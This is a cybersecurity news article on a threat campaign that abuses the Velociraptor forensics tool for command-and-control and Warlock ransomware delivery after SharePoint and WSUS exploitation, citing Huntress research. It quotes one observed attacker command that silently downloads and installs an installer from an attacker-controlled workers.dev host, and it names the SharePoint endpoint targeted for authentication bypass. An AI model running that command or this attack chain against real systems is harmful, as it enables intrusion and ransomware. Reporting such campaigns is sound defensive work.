Home Cyber Security News Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery
Legitimate administrative tools are increasingly becoming the weapon of choice for sophisticated threat actors aiming to blend in with normal network activity.
A recent campaign has highlighted this dangerous trend, where attackers are weaponizing Velociraptor, a widely respected Digital Forensics and Incident Response (DFIR) tool.
By deploying this software, adversaries effectively establish stealthy Command and Control (C2) channels, allowing them to execute arbitrary commands and maintain persistent access to compromised environments without triggering traditional security alarms.
The attacks, observed throughout late 2025, leverage critical vulnerabilities in widely used enterprise infrastructure, specifically targeting Windows Server Update Services (WSUS) and Microsoft SharePoint.
Once inside, the actors deploy Velociraptor to facilitate lateral movement and, in confirmed cases, deliver the Warlock ransomware.
This dual-use strategy complicates detection, as the presence of forensic tools often signals remediation rather than active compromise.
Huntress security analysts identified this evolving tradecraft after investigating three distinct incidents between September and November.
Their research linked specific indicators, such as the hostname DESKTOP-C1N9M, to the financially motivated threat cluster Storm-2603.
The attackers demonstrated a high level of operational security, utilizing Cloudflare tunnels and digitally signed binaries to bypass endpoint defenses and evade network blocklists.
Exploiting SharePoint for Stealthy Access
The infection chain prominently features the exploitation of the “ToolShell” vulnerability chain in Microsoft SharePoint.
Attackers first bypass authentication using CVE-2025-49706 by sending specially crafted HTTP POST requests to /_layouts/15/ToolPane.aspx. Following this, they chain a secondary remote code execution vulnerability (CVE-2025-49704) to modify default files like start.aspx into malicious web shells.
IIS Access Logs for SharePoint Server (Source – Huntress)
This illustrates the suspicious IIS logs revealing these unauthorized requests within the /_layouts/15/ directory.
Once the web shell is active, the threat actors execute commands to download and install Velociraptor via Windows Installer. A typical command observed in these attacks is:
msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi
This installation registers Velociraptor as a system service, ensuring persistence across reboots. Besides this, the Autorun depicts the creation of this autorun service.
Autorun created for Velociraptor to run as a Windows service (Source – Huntress)
To further entrench their position, the attackers use the compromised Velociraptor instance to run Base64 encoded PowerShell commands.
These scripts download Visual Studio Code (code.exe) to create outbound tunnels, effectively masking their malicious traffic within legitimate development activity.
VS Code logs for tunnel creation (Source – Huntress)
The VS Code logs highlight the events generated during this tunnel-creation process, showing how the actors pivot from forensic tool abuse to complete network domination.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
RELATED ARTICLESMORE FROM AUTHOR
Cyber Security News
CISA Warns of Zimbra Collaboration Suite Vulnerability Exploited in Attacks
Cyber Security News
CISA Urges Organizations to Secure Microsoft Intune Environments Following Stryker Breach
Cyber Security
Critical Ubiquiti UniFi Vulnerabilities Allow Attackers to Seize Full Control of Underlying Systems
Top 10
Essential E-Signature Solutions for Cybersecurity in 2026
January 31, 2026
Top 10 Best Data Removal Services In 2026
January 29, 2026
Best VPN Services of 2026: Fast, Secure & Affordable
January 26, 2026
Top 10 Best Data Security Companies in 2026
January 23, 2026
Top 15 Best Ethical Hacking Tools – 2026
January 15, 2026